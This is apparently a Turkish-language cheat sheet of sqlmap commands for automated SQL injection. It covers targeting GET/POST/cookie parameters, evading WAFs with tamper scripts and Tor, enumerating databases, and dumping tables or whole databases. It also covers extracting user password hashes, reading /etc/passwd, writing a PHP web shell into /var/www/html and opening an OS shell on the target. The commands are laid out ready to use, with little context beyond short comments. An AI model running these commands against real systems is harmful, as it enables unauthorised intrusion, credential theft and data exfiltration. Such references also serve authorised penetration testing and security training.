PwnKit

🛢️ sqlmap — SQLi otomasyonu

Tespit, çıkarım, dosya okuma/yazma ve shell elde etme için kapsamlı araç.

Söz dizimi ve hedef belirtme

#1
sqlmap -u "http://site/?id=1" --batch
#2
sqlmap -r request.txt --batch # Burp/req dosyasından
#3
sqlmap -u URL --method POST --data "id=1" # POST gövdesi
#4
sqlmap -u URL --cookie "sid=AAA; id=1" # Cookie içindeki parametre
#5
sqlmap -u URL -p id # Sadece id paramını test et

İstek başlıkları ve kimlik doğrulama

#1
sqlmap -u URL --random-agent
#2
sqlmap -u URL --user-agent "MyUA/1.0" --referer https://google.com
#3
sqlmap -u URL --headers "X-Token: 123"
#4
sqlmap -u URL --auth-type Basic --auth-cred user:pass
#5
sqlmap -u URL --proxy http://127.0.0.1:8080 --ignore-redirects

Tespit seviyesi, risk ve teknikler

#1
sqlmap -u URL --level 1 # az parametre/az test
#2
sqlmap -u URL --level 5 --risk 3 # kapsamlı tarama
#3
sqlmap -u URL --technique=BEUST # Blind, Error, Union, Stacked, Time
#4
sqlmap -u URL --time-sec 5 # zaman tabanlı bekleme
#5
sqlmap -u URL --union-cols=1-10 --union-char=0 # UNION ayarları

WAF atlatma ve tamper betikleri

#1
sqlmap -u URL --identify-waf
#2
sqlmap -u URL --tamper=randomcase,space2comment,between
#3
sqlmap -u URL --tamper=charencode,percentage,overlongutf8
#4
sqlmap -u URL --tor --tor-port 9050 --check-tor
#5
sqlmap -u URL --delay 0.5 --timeout 15 --retries 2

DBMS ve parmak izi

#1
sqlmap -u URL --fingerprint # DBMS özellikleri
#2
sqlmap -u URL --dbms=MySQL # DBMS’i zorla
#3
sqlmap -u URL --banner --current-user --current-db --is-dba

Keşif ve enumerate

#1
sqlmap -u URL --dbs # veritabanlarını listele
#2
sqlmap -u URL -D db --tables # tablolar
#3
sqlmap -u URL -D db -T tablo --columns # kolonlar
#4
sqlmap -u URL -D db -T tablo --count # kayıt sayısı
#5
sqlmap -u URL -D db -T tablo -C id,ad --dump # seçili kolon dökümü
#6
sqlmap -u URL --tables -D db --search -C email # arama
#7
sqlmap -u URL --dump-all # tüm DB dökümü (dikkat)

Kullanıcı, parola ve haklar

#1
sqlmap -u URL --users --passwords
#2
sqlmap -u URL --privileges --roles --is-dba
#3
sqlmap -u URL --schema # şema bilgisi

Dosya işlemleri ve shell

#1
sqlmap -u URL --file-read=/etc/passwd
#2
sqlmap -u URL --file-write=shell.php --file-dest=/var/www/html/shell.php
#3
sqlmap -u URL --os-cmd "id"
#4
sqlmap -u URL --os-shell # etkileşimli komut

JSON, GraphQL ve özel içerik tipleri

#1
sqlmap -u URL --method POST --data "{\"id\":1}" --headers "Content-Type: application/json"
#2
sqlmap -u URL --data "query={user(id:1){name}}" --headers "Content-Type: application/x-www-form-urlencoded"
#3
sqlmap -u URL --parse-errors # hata sayfalarından ipucu

Performans ve güvenli çalışma

#1
sqlmap -u URL --threads 5
#2
sqlmap -u URL --fresh-queries --flush-session
#3
sqlmap -u URL --safe-url=http://site/health --safe-freq=3
#4
sqlmap -u URL --eta --tmp-dir=/tmp
#5
sqlmap -u URL -v 3 # ayrıntı seviyesi (0–6)

Örnek senaryolar

#1
# 1) Basit GET param tespiti ve tablo dökümü
#2
sqlmap -u "http://site/item.php?id=1" -p id --level 5 --risk 2 --dbs
#3
sqlmap -u "http://site/item.php?id=1" -D shop -T users --columns --dump
#4
# 2) POST formu ve cookie ile
#5
sqlmap -u "http://site/login" --method POST --data "user=1&pass=1" --cookie "PHPSESSID=abc" --batch
#6
# 3) Burp isteğiyle (komple raw)
#7
sqlmap -r login.req --level 5 --risk 3 --technique=BEUST --threads 10
#8
# 4) WAF arkasında zaman tabanlı
#9
sqlmap -u URL --technique=T --time-sec 5 --tamper=randomcase,space2comment --tor